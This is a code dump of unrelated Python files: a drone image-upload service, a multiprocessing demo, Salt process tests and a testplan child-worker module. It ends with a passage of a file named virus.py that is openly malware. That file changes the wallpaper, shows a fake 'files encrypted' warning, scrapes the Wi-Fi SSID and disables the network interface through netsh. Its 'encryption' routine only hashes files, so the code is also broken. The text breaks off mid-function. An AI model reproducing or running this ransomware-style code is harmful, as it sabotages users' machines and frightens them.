sleep(add_time)
def stop(self):
self.status = "down"
print("stoping imageService")
pass
def save_img(self, img):
# this function will receive an image and store it locally
# with telemetry data(hopefully inside photo metadata).
pass
def get_telemetry(self):
# this function probes telem2 port on pixhawk for gps data
pass
# returns Encoded image given filename
# returns None if image couldn't be opened
def get_encoded_img(self, img):
try:
with open(img, "rb") as image_file:
return base64.b64encode(image_file.read())
except Exception as e:
# print(str(e))
print("Failed to get encoded image. Removing from queue.")
return None
# accepts image dictionary object
# returns True if image successfully sent to groundstation
def send_img(self, img):
timestamp = time.time() * 1000
try:
payload = {
"timestamp": timestamp,
"image": img["image"].decode("utf-8", "ignore"),
"telemetry": img["telemetry"],
}
requests.post(self.groundstation_url + "/images", json=payload)
print("successfully sent image to the groundstation.")
return True
except Exception as e:
print(str(e))
print("Failed to send image to groundstation")
return False
# File pointer
# this function must send images to
# the ground station in the form of a post request
# refer to apps/SonyCamera/stillProcessor.py for example
# 1. encode img in base 64
# 2. add gps data and encoded image to dict
# 3. requests.post(groundstation_url + '/images', json=payload)
# pass
# protects queue mutex
# add an image to the Image queue
def appendImageQueue(self, img):
self.mutex.acquire()
self.image_queue.append(img)
self.mutex.release()
# protects queue mutex
# return an image from the top of the queue
def popImageQueue(self):
return self.image_queue.pop(0)
# protects queue mutex
# returns None if queue is empty
def peekImageQueue(self):
head = None
if self.image_queue:
head = self.image_queue[0]
return head
imageService = ImageService()
|
pool_2.py
|
from multiprocessing import Process
def f(name):
print('hello', name)
if __name__ == '__main__':
p = Process(target=f, args=('bob',))
p.start()
p.join()
|
test_process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import io
import os
import sys
import threading
import time
import signal
import multiprocessing
import functools
import datetime
import warnings
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import salt libs
import salt.utils.platform
import salt.utils.process
from salt.utils.versions import warn_until_date
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
import psutil
def die(func):
'''
Add proc title
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _die():
salt.utils.process.appendproctitle('test_{0}'.format(name))
attrname = 'die_' + name
setattr(self, attrname, _die)
self.addCleanup(delattr, self, attrname)
return wrapper
def incr(func):
'''
Increment counter
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _incr(counter, num):
salt.utils.process.appendproctitle('test_{0}'.format(name))
for _ in range(0, num):
counter.value += 1
attrname = 'incr_' + name
setattr(self, attrname, _incr)
self.addCleanup(delattr, self, attrname)
return wrapper
def spin(func):
'''
Spin indefinitely
'''
@functools.wraps(func)
def wrapper(self):
# Strip off the "test_" from the function name
name = func.__name__[5:]
def _spin():
salt.utils.process.appendproctitle('test_{0}'.format(name))
while True:
time.sleep(1)
attrname = 'spin_' + name
setattr(self, attrname, _spin)
self.addCleanup(delattr, self, attrname)
return wrapper
class TestProcessManager(TestCase):
@spin
def test_basic(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_basic)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid == next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@spin
def test_kill(self):
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.spin_kill)
initial_pid = next(six.iterkeys(process_manager._process_map))
# kill the child
if salt.utils.platform.is_windows():
os.kill(initial_pid, signal.SIGTERM)
else:
os.kill(initial_pid, signal.SIGKILL)
# give the OS time to give the signal...
time.sleep(0.1)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@die
def test_restarting(self):
'''
Make sure that the process is alive 2s later
'''
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.die_restarting)
initial_pid = next(six.iterkeys(process_manager._process_map))
time.sleep(2)
process_manager.check_children()
try:
assert initial_pid != next(six.iterkeys(process_manager._process_map))
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
@skipIf(sys.version_info < (2, 7), 'Needs > Py 2.7 due to bug in stdlib')
@incr
def test_counter(self):
counter = multiprocessing.Value('i', 0)
process_manager = salt.utils.process.ProcessManager()
process_manager.add_process(self.incr_counter, args=(counter, 2))
time.sleep(1)
process_manager.check_children()
time.sleep(1)
# we should have had 2 processes go at it
try:
assert counter.value == 4
finally:
process_manager.stop_restarting()
process_manager.kill_children()
time.sleep(0.5)
# Are there child processes still running?
if process_manager._process_map.keys():
process_manager.send_signal_to_processes(signal.SIGKILL)
process_manager.stop_restarting()
process_manager.kill_children()
class TestThreadPool(TestCase):
def test_basic(self):
'''
Make sure the threadpool can do things
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
pool = salt.utils.process.ThreadPool()
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
time.sleep(1) # Sleep to let the threads do things
self.assertEqual(counter.value, 1)
self.assertEqual(pool._job_queue.qsize(), 0)
def test_full_queue(self):
'''
Make sure that a full threadpool acts as we expect
'''
def incr_counter(counter):
counter.value += 1
counter = multiprocessing.Value('i', 0)
# Create a pool with no workers and 1 queue size
pool = salt.utils.process.ThreadPool(0, 1)
# make sure we can put the one item in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertTrue(sent)
# make sure we can't put more in
sent = pool.fire_async(incr_counter, args=(counter,))
self.assertFalse(sent)
time.sleep(1) # Sleep to let the threads do things
# make sure no one updated the counter
self.assertEqual(counter.value, 0)
# make sure the queue is still full
self.assertEqual(pool._job_queue.qsize(), 1)
class TestProcess(TestCase):
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_daemonize_if(self):
# pylint: disable=assignment-from-none
with patch('sys.argv', ['salt-call']):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
ret = salt.utils.process.daemonize_if({'multiprocessing': False})
self.assertEqual(None, ret)
with patch('sys.platform', 'win'):
ret = salt.utils.process.daemonize_if({})
self.assertEqual(None, ret)
with patch('salt.utils.process.daemonize'), \
patch('sys.platform', 'linux2'):
salt.utils.process.daemonize_if({})
self.assertTrue(salt.utils.process.daemonize.called)
# pylint: enable=assignment-from-none
class TestProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks(self):
'Validate Process call after fork and finalize methods'
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
evt = multiprocessing.Event()
proc = salt.utils.process.Process(target=self.process_target, args=(evt,))
proc.run()
assert evt.is_set()
mb.assert_called()
ma.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks_called_when_run_overriden(self):
'Validate Process sub classes call after fork and finalize methods when run is overridden'
class MyProcess(salt.utils.process.Process):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
proc = MyProcess()
proc.run()
assert proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestSignalHandlingProcess(TestCase):
@classmethod
def Process(cls, pid):
raise psutil.NoSuchProcess(pid)
@classmethod
def target(cls):
os.kill(os.getpid(), signal.SIGTERM)
@classmethod
def children(cls, *args, **kwargs):
raise psutil.NoSuchProcess(1)
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_does_not_exist(self):
try:
with patch('psutil.Process', self.Process):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_process_children_do_not_exist(self):
try:
with patch('psutil.Process.children', self.children):
proc = salt.utils.process.SignalHandlingProcess(target=self.target)
proc.start()
except psutil.NoSuchProcess:
assert False, "psutil.NoSuchProcess raised"
@staticmethod
def run_forever_sub_target(evt):
'Used by run_forever_target to create a sub-process'
while not evt.is_set():
time.sleep(1)
@staticmethod
def run_forever_target(sub_target, evt):
'A target that will run forever or until an event is set'
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@staticmethod
def kill_target_sub_proc():
pid = os.fork()
if pid == 0:
return
pid = os.fork()
if pid == 0:
return
time.sleep(.1)
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
pass
@skipIf(sys.platform.startswith('win'), 'No os.fork on Windows')
def test_signal_processing_regression_test(self):
evt = multiprocessing.Event()
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt)
)
sh_proc.start()
proc = multiprocessing.Process(target=self.kill_target_sub_proc)
proc.start()
proc.join()
# When the bug exists, the kill_target_sub_proc signal will kill both
# processes. sh_proc will be alive if the bug is fixed
try:
assert sh_proc.is_alive()
finally:
evt.set()
sh_proc.join()
@staticmethod
def no_op_target():
pass
@staticmethod
def pid_setting_target(sub_target, val, evt):
val.value = os.getpid()
p = multiprocessing.Process(target=sub_target, args=(evt,))
p.start()
p.join()
@skipIf(sys.platform.startswith('win'), 'Required signals not supported on windows')
def test_signal_processing_handle_signals_called(self):
'Validate SignalHandlingProcess handles signals'
# Gloobal event to stop all processes we're creating
evt = multiprocessing.Event()
# Create a process to test signal handler
val = multiprocessing.Value('i', 0)
proc = salt.utils.process.SignalHandlingProcess(
target=self.pid_setting_target,
args=(self.run_forever_sub_target, val, evt),
)
proc.start()
# Create a second process that should not respond to SIGINT or SIGTERM
proc2 = multiprocessing.Process(
target=self.run_forever_target,
args=(self.run_forever_sub_target, evt),
)
proc2.start()
# Wait for the sub process to set it's pid
while not val.value:
time.sleep(.3)
assert not proc.signal_handled()
# Send a signal that should get handled by the subprocess
os.kill(val.value, signal.SIGTERM)
# wait up to 10 seconds for signal handler:
start = time.time()
while time.time() - start < 10:
if proc.signal_handled():
break
time.sleep(.3)
try:
# Allow some time for the signal handler to do it's thing
assert proc.signal_handled()
# Reap the signaled process
proc.join(1)
assert proc2.is_alive()
finally:
evt.set()
proc2.join(30)
proc.join(30)
class TestSignalHandlingProcessCallbacks(TestCase):
@staticmethod
def process_target(evt):
evt.set()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks(self):
'Validate SignalHandlingProcess call after fork and finalize methods'
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
evt = multiprocessing.Event()
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = salt.utils.process.SignalHandlingProcess(
target=self.process_target,
args=(evt,)
)
sh_proc.run()
assert evt.is_set()
ma.assert_called()
mb.assert_called()
@skipIf(NO_MOCK, NO_MOCK_REASON)
def test_callbacks_called_when_run_overriden(self):
'Validate SignalHandlingProcess sub classes call after fork and finalize methods when run is overridden'
class MyProcess(salt.utils.process.SignalHandlingProcess):
def __init__(self):
super(MyProcess, self).__init__()
self.evt = multiprocessing.Event()
def run(self):
self.evt.set()
teardown_to_mock = 'salt.log.setup.shutdown_multiprocessing_logging'
log_to_mock = 'salt.utils.process.Process._setup_process_logging'
sig_to_mock = 'salt.utils.process.SignalHandlingProcess._setup_signals'
# Mock _setup_signals so we do not register one for this process.
with patch(sig_to_mock):
with patch(teardown_to_mock) as ma, patch(log_to_mock) as mb:
sh_proc = MyProcess()
sh_proc.run()
assert sh_proc.evt.is_set()
ma.assert_called()
mb.assert_called()
class TestDup2(TestCase):
def test_dup2_no_fileno(self):
'The dup2 method does not fail on streams without fileno support'
f1 = io.StringIO("some initial text data")
f2 = io.StringIO("some initial other text data")
with self.assertRaises(io.UnsupportedOperation):
f1.fileno()
with patch('os.dup2') as dup_mock:
try:
salt.utils.process.dup2(f1, f2)
except io.UnsupportedOperation:
assert False, 'io.UnsupportedOperation was raised'
assert not dup_mock.called
def null_target():
pass
def event_target(event):
while True:
if event.wait(5):
break
class TestProcessList(TestCase):
@staticmethod
def wait_for_proc(proc, timeout=10):
start = time.time()
while proc.is_alive():
if time.time() - start > timeout:
raise Exception("Process did not finishe before timeout")
time.sleep(.3)
def test_process_list_process(self):
plist = salt.utils.process.SubprocessList()
proc = multiprocessing.Process(target=null_target)
proc.start()
plist.add(proc)
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
def test_process_list_thread(self):
plist = salt.utils.process.SubprocessList()
thread = threading.Thread(target=null_target)
thread.start()
plist.add(thread)
assert thread in plist.processes
self.wait_for_proc(thread)
assert not thread.is_alive()
plist.cleanup()
assert thread not in plist.processes
def test_process_list_cleanup(self):
plist = salt.utils.process.SubprocessList()
event = multiprocessing.Event()
proc = multiprocessing.Process(target=event_target, args=[event])
proc.start()
plist.add(proc)
assert proc in plist.processes
plist.cleanup()
event.set()
assert proc in plist.processes
self.wait_for_proc(proc)
assert not proc.is_alive()
plist.cleanup()
assert proc not in plist.processes
class TestDeprecatedClassNames(TestCase):
@staticmethod
def process_target():
pass
@staticmethod
def patched_warn_until_date(current_date):
def _patched_warn_until_date(date,
message,
category=DeprecationWarning,
stacklevel=None,
_current_date=current_date,
_dont_call_warnings=False):
# Because we add another function in between, the stacklevel
# set in salt.utils.process, 3, needs to now be 4
stacklevel = 4
return warn_until_date(date,
message,
category=category,
stacklevel=stacklevel,
_current_date=_current_date,
_dont_call_warnings=_dont_call_warnings)
return _patched_warn_until_date
def test_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.MultiprocessingProcess\' '
'and instead use \'salt.utils.process.Process\'. '
'\'salt.utils.process.MultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.MultiprocessingProcess' "
r"and instead use 'salt.utils.process.Process'. "
r"'salt.utils.process.MultiprocessingProcess' will go away "
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r"filename '(.*)test_process.py', line number ([\d]+), is "
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.MultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_warning(self):
# We *always* want *all* warnings thrown on this module
warnings.filterwarnings('always', '', DeprecationWarning, __name__)
fake_utcnow = datetime.date(2021, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
# Test warning
with warnings.catch_warnings(record=True) as recorded_warnings:
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
self.assertEqual(
'Please stop using \'salt.utils.process.SignalHandlingMultiprocessingProcess\' '
'and instead use \'salt.utils.process.SignalHandlingProcess\'. '
'\'salt.utils.process.SignalHandlingMultiprocessingProcess\' will go away '
'after 2022-01-01.',
six.text_type(recorded_warnings[0].message)
)
finally:
if proc is not None:
del proc
def test_signal_handling_multiprocessing_process_runtime_error(self):
fake_utcnow = datetime.date(2022, 1, 1)
proc = None
try:
with patch('salt.utils.versions.warn_until_date', self.patched_warn_until_date(fake_utcnow)):
with self.assertRaisesRegex(
RuntimeError,
r"Please stop using 'salt.utils.process.SignalHandlingMultiprocessingProcess' "
r"and instead use 'salt.utils.process.SignalHandlingProcess'. "
r"'salt.utils.process.SignalHandlingMultiprocessingProcess' will go away "
r'after 2022-01-01. '
r'This warning\(now exception\) triggered on '
r"filename '(.*)test_process.py', line number ([\d]+), is "
r'supposed to be shown until ([\d-]+). Today is ([\d-]+). '
r'Please remove the warning.'):
proc = salt.utils.process.SignalHandlingMultiprocessingProcess(target=self.process_target)
finally:
if proc is not None:
del proc
|
child.py
|
"""Child worker process module."""
import os
import sys
import time
import pickle
import signal
import socket
import shutil
import inspect
import logging
import argparse
import platform
import threading
import subprocess
def parse_cmdline():
"""Child worker command line parsing"""
parser = argparse.ArgumentParser(description='Remote runner parser')
parser.add_argument('--address', action="store")
parser.add_argument('--index', action="store")
parser.add_argument('--testplan', action="store")
parser.add_argument('--testplan-deps', action="store", default=None)
parser.add_argument('--wd', action="store")
parser.add_argument('--runpath', action="store", default=None)
parser.add_argument('--type', action="store")
parser.add_argument('--log-level', action="store", default=0, type=int)
parser.add_argument('--remote-pool-type', action="store", default='thread')
parser.add_argument('--remote-pool-size', action="store", default=1)
return parser.parse_args()
class ZMQTransport(object):
"""
Transport layer for communication between a pool and child process worker.
Worker send serializable messages, pool receives and send back responses.
:param address: Pool address to connect to.
:type address: ``float``
:param recv_sleep: Sleep duration in msg receive loop.
:type recv_sleep: ``float``
"""
def __init__(self, address, recv_sleep=0.05, recv_timeout=5):
import zmq
self._zmq = zmq
self._recv_sleep = recv_sleep
self._recv_timeout = recv_timeout
self._context = zmq.Context()
self._sock = self._context.socket(zmq.REQ)
self._sock.connect("tcp://{}".format(address))
self.active = True
self.logger = logging.getLogger(self.__class__.__name__)
def send(self, message):
"""
Worker sends a message.
:param message: Message to be sent.
:type message: :py:class:`~testplan.runners.pools.communication.Message`
"""
self._sock.send(pickle.dumps(message))
def receive(self):
"""
Worker receives the response to the message sent.
:return: Response to the message sent.
:type: :py:class:`~testplan.runners.pools.communication.Message`
"""
start_time = time.time()
while self.active:
try:
received = self._sock.recv(flags=self._zmq.NOBLOCK)
try:
loaded = pickle.loads(received)
except Exception as exc:
print('Deserialization error. - {}'.format(exc))
raise
else:
return loaded
except self._zmq.Again:
if time.time() - start_time > self._recv_timeout:
print('Transport receive timeout {}s reached!'.format(
self._recv_timeout))
return None
time.sleep(self._recv_sleep)
return None
class ChildLoop(object):
"""
Child process loop that can be started in a process and starts a local
thread pool to execute the tasks received.
"""
def __init__(self, index, transport, pool_type, pool_size,
worker_type, logger, runpath=None):
self._metadata = {'index': index, 'pid': os.getpid()}
self._transport = transport
self._pool_type = pool_type
self._pool_size = int(pool_size)
self._pool_cfg = None
self._worker_type = worker_type
self._to_heartbeat = float(0)
self.runpath = runpath
self.logger = logger
@property
def metadata(self):
"""Metadata information."""
return self._metadata
def heartbeat_thread(self):
"""Manage a variable that indicates the sending of next heartbeat."""
while self._pool.status.tag == self._pool.STATUS.STARTED:
if self._to_heartbeat > 0:
sleep_interval = max(float(self._to_heartbeat)/2, 0.1)
self._to_heartbeat -= sleep_interval
time.sleep(sleep_interval)
else:
time.sleep(0.1)
def heartbeat_setup(self):
"""Start the heartbeat manager thread."""
heartbeat = threading.Thread(target=self.heartbeat_thread,)
heartbeat.daemon = True
heartbeat.start()
def _child_pool(self):
# Local thread pool will not cleanup the previous layer runpath.
self._pool = self._pool_type(
name='Pool_{}'.format(self._metadata['pid']),
worker_type=self._worker_type,
size=self._pool_size,
runpath=self.runpath)
self._pool.parent = self
self._pool.cfg.parent = self._pool_cfg
return self._pool
def _handle_abort(self, signum, frame):
self.logger.debug('Signal handler called for signal {} from {}'.format(
signum, threading.current_thread()))
if self._pool:
self._pool.abort()
os.kill(os.getpid(), 9)
self.logger.debug('Pool {} aborted.'.format(self._pool))
def _setup_logfiles(self):
if not os.path.exists(self.runpath):
os.makedirs(self.runpath)
stderr_file = os.path.join(self.runpath, '{}_stderr'.format(self._metadata['index']))
log_file = os.path.join(self.runpath, '{}_stdout'.format(self._metadata['index']))
self.logger.info('stdout file = %(file)s (log level = %(lvl)s)',
{'file': log_file, 'lvl': self.logger.level})
self.logger.info('stderr file = %s', stderr_file)
self.logger.info(
'Closing stdin, stdout and stderr file descriptors...')
# This closes stdin, stdout and stderr for this process.
for fdesc in range(3):
os.close(fdesc)
mode = 'w' if platform.python_version().startswith('3') else 'wb'
sys.stderr = open(stderr_file, mode)
fhandler = logging.FileHandler(log_file)
fhandler.setLevel(self.logger.level)
self.logger.addHandler = fhandler
def _send_and_expect(self, message, send, expect):
try:
return self._transport.send_and_receive(message.make(
send), expect=expect)
except AttributeError:
self.logger.critical('Pool seems dead, child exits.')
raise
def _pre_loop_setup(self, message):
response = self._send_and_expect(
message, message.ConfigRequest, message.ConfigSending)
# Response.data: [cfg, cfg.parent, cfg.parent.parent, ...]
pool_cfg = response.data[0]
for idx, cfg in enumerate(response.data):
try:
cfg.parent = response.data[idx + 1]
print(cfg.parent)
except IndexError:
break
self._pool_cfg = pool_cfg
for sig in self._pool_cfg.abort_signals:
signal.signal(sig, self._handle_abort)
pool_metadata = response.sender_metadata
self.runpath = self.runpath or str(pool_metadata['runpath'])
self._setup_logfiles()
def worker_loop(self):
"""
Child process worker loop. Manages an underlying thread pool, pulls and
sends back results to the main pool.
"""
from testplan.runners.pools.communication import Message
from testplan.common.utils.exceptions import format_trace
message = Message(**self.metadata)
try:
self._pre_loop_setup(message)
except Exception as exc:
self._transport.send_and_receive(message.make(
message.SetupFailed,
data=format_trace(inspect.trace(), exc)), expect=message.Ack)
return
with self._child_pool():
if self._pool_cfg.worker_heartbeat:
self.heartbeat_setup()
message = Message(**self.metadata)
next_possible_request = time.time()
request_delay = self._pool_cfg.active_loop_sleep
while True:
if self._pool_cfg.worker_heartbeat and self._to_heartbeat <= 0:
hb_resp = self._transport.send_and_receive(message.make(
message.Heartbeat, data=time.time()))
if hb_resp is None:
self.logger.critical('Pool seems dead, child exits.')
self.exit_loop()
break
else:
self.logger.debug(
'Pool heartbeat response:'
' {} at {} before {}s.'.format(
hb_resp.cmd, hb_resp.data,
time.time() - hb_resp.data))
self._to_heartbeat = self._pool_cfg.worker_heartbeat
# Send back results
if self._pool.results:
task_results = []
for uid in list(self._pool.results.keys()):
task_results.append(self._pool.results[uid])
self.logger.debug('Sending back result for {}'.format(
self._pool.results[uid].task))
del self._pool.results[uid]
self._transport.send_and_receive(message.make(
message.TaskResults,
data=task_results), expect=message.Ack)
# Request new tasks
demand = self._pool.workers_requests() -\
len(self._pool.unassigned)
if demand > 0 and time.time() > next_possible_request:
received = self._transport.send_and_receive(message.make(
message.TaskPullRequest, data=demand))
if received is None or received.cmd == Message.Stop:
self.logger.critical('Child exits.')
self.exit_loop()
break
elif received.cmd == Message.TaskSending:
next_possible_request = time.time()
request_delay = 0
for task in received.data:
self.logger.debug('Added {} to local pool'.format(
task))
self._pool.add(task, task.uid())
# Reset workers request counters
for worker in self._pool._workers:
worker.requesting = 0
elif received.cmd == Message.Ack:
request_delay = min(
(request_delay + 0.2) * 1.5,
self._pool_cfg.max_active_loop_sleep)
next_possible_request = time.time() + request_delay
pass
time.sleep(self._pool_cfg.active_loop_sleep)
self.logger.info('Local pool {} stopped.'.format(self._pool))
def exit_loop(self):
self._pool.abort()
class RemoteChildLoop(ChildLoop):
"""
Child loop for remote workers.
This involved exchange of metadata for additional functionality.
"""
def __init__(self, *args, **kwargs):
super(RemoteChildLoop, self).__init__(*args, **kwargs)
self._setup_metadata = None
def _pre_loop_setup(self, message):
super(RemoteChildLoop, self)._pre_loop_setup(message)
self._setup_metadata = self._send_and_expect(
message, message.MetadataPull, message.Metadata).data
if self._setup_metadata.env:
for key, value in self._setup_metadata.env.items():
os.environ[key] = value
os.environ['TESTPLAN_LOCAL_WORKSPACE'] = \
self._setup_metadata.workspace_paths.local
os.environ['TESTPLAN_REMOTE_WORKSPACE'] = \
self._setup_metadata.workspace_paths.remote
if self._setup_metadata.push_dir:
os.environ['TESTPLAN_PUSH_DIR'] = self._setup_metadata.push_dir
if self._setup_metadata.setup_script:
if subprocess.call(self._setup_metadata.setup_script,
stdout=sys.stdout, stderr=sys.stderr):
raise RuntimeError('Setup script exited with non 0 code.')
def exit_loop(self):
if self._pool.cfg.delete_pushed:
for item in self._setup_metadata.push_dirs:
self.logger.test_info('Removing directory: {}'.format(item))
shutil.rmtree(item, ignore_errors=True)
for item in self._setup_metadata.push_files:
self.logger.test_info('Removing file: {}'.format(item))
os.remove(item)
# Only delete the source workspace if it was transferred.
if self._setup_metadata.workspace_pushed is True:
self.logger.test_info('Removing workspace: {}'.format(
self._setup_metadata.workspace_paths.remote))
shutil.rmtree(self._setup_metadata.workspace_paths.remote,
ignore_errors=True)
super(RemoteChildLoop, self).exit_loop()
def child_logic(args):
"""Able to be imported child logic."""
if args.log_level:
from testplan.common.utils.logger import TESTPLAN_LOGGER
TESTPLAN_LOGGER.setLevel(args.log_level)
import psutil
print('Starting child process worker on {}, {} with parent {}'.format(
socket.gethostname(), os.getpid(), psutil.Process(os.getpid()).ppid()))
if args.runpath:
print('Removing old runpath: {}'.format(args.runpath))
shutil.rmtree(args.runpath, ignore_errors=True)
from testplan.runners.pools.base import (
Pool, Worker, Transport)
from testplan.runners.pools.process import (
ProcessPool, ProcessWorker, ProcessTransport)
class ChildTransport(ZMQTransport, Transport):
"""Transport that supports message serialization."""
class NoRunpathPool(Pool):
"""
Pool that creates no runpath directory.
Has only one worker.
Will use the one already created by parent process.
"""
# To eliminate a not needed runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
def starting(self):
super(Pool, self).starting() # pylint: disable=bad-super-call
self.make_runpath_dirs()
self._metadata['runpath'] = self.runpath
# Create a local thread worker with the process pool index
worker = self.cfg.worker_type(index=args.index,
runpath=self.cfg.runpath)
self.logger.info('Created {}'.format(worker))
worker.parent = self
worker.cfg.parent = self.cfg
self._workers.add(worker, uid=args.index)
# print('Added worker with id {}'.format(idx))
self._conn.register(worker)
self._workers.start()
class NoRunpathThreadPool(Pool):
"""
Pool that creates no runpath directory.
Will use the one already created by parent process.
Supports multiple thread workers.
"""
# To eliminate a not needed runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
class NoRunpathProcessPool(ProcessPool):
"""
Pool that creates no runpath directory.
Will use the one already created by parent process.
Supports multiple process workers.
"""
# To eliminate a not needed runpath layer.
def make_runpath_dirs(self):
self._runpath = self.cfg.runpath
if args.type == 'process_worker':
transport = ChildTransport(address=args.address)
loop = ChildLoop(args.index, transport, NoRunpathPool, 1, Worker,
TESTPLAN_LOGGER)
loop.worker_loop()
elif args.type == 'remote_worker':
if args.remote_pool_type == 'process':
pool_type = NoRunpathProcessPool
worker_type = ProcessWorker
else:
pool_type = NoRunpathThreadPool
worker_type = Worker
transport = ChildTransport(address=args.address)
loop = RemoteChildLoop(
args.index, transport, pool_type, args.remote_pool_size,
worker_type, TESTPLAN_LOGGER, runpath=args.runpath)
loop.worker_loop()
if __name__ == '__main__':
"""
To start an external child process worker.
"""
ARGS = parse_cmdline()
if ARGS.wd:
os.chdir(ARGS.wd)
sys.path.insert(0, ARGS.wd)
if ARGS.testplan:
sys.path.append(ARGS.testplan)
if ARGS.testplan_deps:
sys.path.append(ARGS.testplan_deps)
try:
import dependencies
# This will also import dependencies from $TESTPLAN_DEPENDENCIES_PATH
except ImportError:
pass
import testplan
if ARGS.testplan_deps:
os.environ[testplan.TESTPLAN_DEPENDENCIES_PATH] = ARGS.testplan_deps
child_logic(ARGS)
|
virus.py
|
import shutil
import os
import hashlib
import ctypes
import subprocess, re
import socket
import time
from multiprocessing import Process
main_file_directory = os.getcwd()
user_name = os.getenv('username')
destination_directory = "C://Users//" + user_name
executable_file_directory = destination_directory + "virus.exe"
sha_256 = hashlib.sha256
def warning():
wall_paper_file = "bg.jpg"
ctypes.windll.user32.SystemParametersInfoW(20, 0, wall_paper_file , 3)
ctypes.windll.user32.MessageBoxW(0, "Your file has been encrypted!", "Warning", 0)
def encryption(file_list):
h = hashlib.sha256()
b = bytearray(128*1024)
mv = memoryview(b)
for filename in file_list:
with open(filename, 'rb', buffering=0) as f:
for n in iter(lambda : f.readinto(mv), 0):
h.update(mv[:n])
exit()
def wifi_scraper():
ssid = re.search('(?<=: ).*', re.search(r'(?<=\n) *SSID.*(?=\r\n)', subprocess.check_output('netsh wlan show interfaces', creationflags=subprocess.CREATE_NO_WINDOW).decode('utf-8')).group()).group()
return ssid
def offline_maker(wifi):
def connection_checking():
try:
host = socket.gethostbyname("www.google.com")
s = socket.create_connection((host, 80), 2)
return True
except:
pass
return False
try:
os.system("netsh interface set interface name = " + wifi + " admin=DISABLED")
except:
pass
while True:
connection = connection_checking()
if connection == False:
